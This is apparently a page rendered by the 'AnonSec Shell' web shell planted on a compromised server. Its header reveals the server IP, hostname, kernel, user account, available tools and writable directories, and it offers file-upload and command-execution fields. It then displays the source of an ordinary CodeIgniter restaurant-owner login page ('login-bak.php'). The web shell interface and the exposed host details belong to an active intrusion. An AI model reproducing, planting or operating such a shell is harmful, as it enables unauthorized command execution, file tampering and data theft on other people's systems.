AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/restaurantadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/restaurantadmin/login-bak.php
<!DOCTYPE html>
<html class="no-js"> 
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Login - Restaurant Owners</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
  <link rel="stylesheet" type="text/css" href="<?php echo base_url(); ?>assets/css/style.css" />
  <script src="<?php echo base_url(); ?>assets/js/validator.js"></script>
</head>
<body>
  <div class="content">
    <div class="icon-item text--center">
      <a href="javascript:void(0)">
        <img src="<?php echo base_url(); ?>assets/logo-main.png" style="margin-top:20px;">
      </a>
    </div>
    <div id="fb-root"></div>
    <h3 class="h3custom">Have an Account?</h3>
    <p class="primary-font primary-font--semibold background-line push--top push--bottom">
      <span>Restaurant Owners Login </span>
    </p>
    <?php if(validation_errors() != false) { ?> 
      <div class="alert alert-danger text--center">
          <?php echo validation_errors(); ?>
      </div>
    <?php } ?>
    <?php $validator = array('role' => 'form', 'data-toggle' => 'validator'); echo form_open('verifylogin_restadmin', $validator); ?>
      <div class="form-group push-tiny--top flush--bottom " id="input-container">
        <input type="username"  name="username"
          class="text-input square--bottom "
            placeholder="Email Address"
          value="<?php echo set_value('username', isset($data['username']) ? $data['username'] : ''); ?>" id="email" autofocus autocomplete="off" maxlength="20" required/>

      </div>
      <div class="form-group push--bottom">
        <input type="password" name="password"
          class="text-input square--top "
          placeholder="Password" id="password" style="margin-top:15px;" maxlength="20" required />
      </div>
      <!-- <div class="form-group push--bottom">
        <input type="checkbox" id="checkbox-rememberme" class="hidden" checked />
        <label class="checkbox" for="checkbox-rememberme">
          Remember Me
        </label>
        <span class="rememberme-forgetpassword-separator">&#8226;</span>
        <a href="<?php echo base_url(); ?>superadmin/forgot_password" class="forgot-password " >
          Forgot Password
        </a>
      </div> -->
      <button onclick="#'" type="submit" class="btn btn--large btn--full" type="submit" style="background:#3C8DBC">Sign In</button>
    </form>

    <!-- <hr class="push--top"/> -->

  </div>
  <style type="text/css">
    .has-error.has-danger input, .has-error input, .has-danger input, .has-error.has-danger textarea, .has-error textarea, .has-danger textarea, .has-error.has-danger select, .has-error select, .has-danger select {
      border-color: #a94442 !important;
      box-shadow: 0px 0px 0px #fff !important;
    }
    .alert {
      margin-top: 10px;
      margin-bottom: 10px;
    }
  </style>
</body>
</html>

Anon7 - 2022
AnonSec Team